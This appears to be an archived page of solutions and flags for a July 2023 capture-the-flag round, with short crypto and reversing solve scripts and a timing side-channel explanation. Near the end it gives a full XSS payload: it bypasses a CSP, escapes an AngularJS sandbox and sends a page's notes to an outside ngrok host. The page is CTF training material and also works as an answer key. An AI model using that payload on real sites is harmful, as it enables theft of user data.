Archived Challenges - July 2023

Copy and paste the flag.

ictf{welcome_to_r0und_36!?!?!?!?!?}

from Crypto.Cipher import AES

ct = b'\xe4\xda\xdbD\x82(\x0c\x9bR\xcc\t\xcb\xe6\x14\xbc\x1e\x87\xf5\x06\xc0-K\xe2A\xdc}\x03\xc7^e\xa0i\xed\xbc[*\x91yG\x90\xa6\xe6\xed\xbf4EY\xe3A\\\x8c\x86=V#u0\x8b\xe3\xb1\x91Q)D'

key = b"_verysecurekey_!"
cipher = AES.new(key, AES.MODE_ECB)

for s in range(256):
  out = []
  for n in ct:
    out.append((n + s) % 256)
  if b"ictf" in cipher.decrypt(bytes(out)):
    print(cipher.decrypt(bytes(out)))```

ictf{oops_forgot_to_redact_the_key}

print(long_to_bytes(pow(ct, d, n)))```

ictf{noooo!_my_evil_plans_were_FOIL'd_again!!!}

strings libc.so.6 | grep free

Alternatively,

#include <stdio.h>

int main() {
 char * a = malloc(10);
 free(a);
 free(a);
}

gcc a.c -o a patchelf --replace-needed libc.so.6 ./libc.so.6 a

ictf{fr33_str1ngs}

https://imaginaryctf.org/f/pit6u#strange.py

ictf{you_might_need_a_debugger_for_this_one_btw}

Overflow everything to zero.

ictf{hoothoot_uses_zerooverflow}

There are 2 main ways to solve this. One way would be to directly open up the executable on IDA or some decompiler, find the python main code using dynamic analysis, and then play around with nuitka compiled executables to then find and reverse the function used to decrypt the encrypted flag (this is here to deter strings). Alternatively one can breakpoint in the loop before the startswith() string operations are called, and then look up the variables at that point to see the flag.

The intended way, is to black box around and subsequently notice that ictf{....... takes longer to compute Wrong or Correct by the executable in contrast to say i........, and thus obtain the flag using a time-based side channel attack.

Both methods are rather time consuming still, but one is much more simpler to perform and takes much shorter time than the other. (albeit on my end my solve script took around 1.8 hours to output the flag as the 0.2 seconds called in time.sleep() adds up by a lot)

Unless there exists a exe2py software that is able to reverse nuitka compiled binaries or even operate on python 3.11, those two should be the few approaches that can net one the flag.

ictf{d1d_uncompyle_wrk?}

Use a bf debugger online to see what's going on. You can see that correct characters will get marked as a 0 and incorrect is a 1. then just trial and error and brute force. Alternatively, manually decipher each character like YAFC (annoying) (dont do this)

https://imaginaryctf.org/f/gKU5U#stranger.py

ictf{w0w_i_h4t3_th1s_a_l0t}

https://imaginaryctf.org/f/Qaw3c#x.py

The binary has an array which translates 12 bits of the input into 3 characters of the encoded flag. Grab the array and map the values back to the flag.

ictf{I_h0pe_th!5_cha1l_!s_n0rm@l_en0ugh..}

def fac(n):
    return 1 if n < 1 else fac(n-1)*n

def key(i):
    return fac(i+20) % 40759

ct = [20379, 22231, 40047, 22485, 8838, 20160, 34181, 28547, 27773, 27981, 22457, 4071, 4900, 1438, 11512, 33162, 15228, 29963, 834, 31108, 25327, 15360, 37694, 32607, 6735, 15813, 33138, 5482, 14601, 27053, 9987, 26176, 14530, 34510, 27096, 21242, 1849, 25880, 36392, 30711, 2542, 26769, 35566, 32658, 16871, 30924, 1425]

flag = [key(i)^v for i,v in enumerate(ct)]
print(bytes(flag))

The binary uses the Y combinator to generate the factorial mod 40759, and xors it with the ciphertext to compare against the flag.

The decompilation (in ghidra, at least) is very nasty, so instead of reversing the key gen algorithm, setting a breakpoint in gdb to dump the key values should also work.

ictf{been_in_a_lambda_calc_sorta_mood_recently}

Google image search will bring you to the Four Corners Monument, from where you can find the location in Google Street View.

ictf{36.999,-109.045}

Find the wasm bof in the updateprofile functionality. Create a payload that overflows and give you xss. Bypass csp and double quote filter Update the profile with the payload in burp(bypassing client side validation) Send profile url to bot with report functionality.

a@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<img src=a onerror='var x=document.createElement(&quot;script&quot;);x.src=&quot;https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js&quot;;document.body.appendChild(x)'/><div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };fetch(&quot;http://0.0.0.0/notes&quot;).then(r=>{r.text().then(t=>{fetch(&quot;https://8691-77-166-241-133.ngrok-free.app/?&quot;+btoa(t),{&quot;mode&quot;:&quot;no-cors&quot;})})});//');}}</div>

ictf{w4sm_0v3rfl0w_t0_xSs_c67e2ec016f0bc0e495655ee70fe2a2d}

https://2023.imaginaryctf.org/

random flag not in flag format that nobody will guess 9f427e2e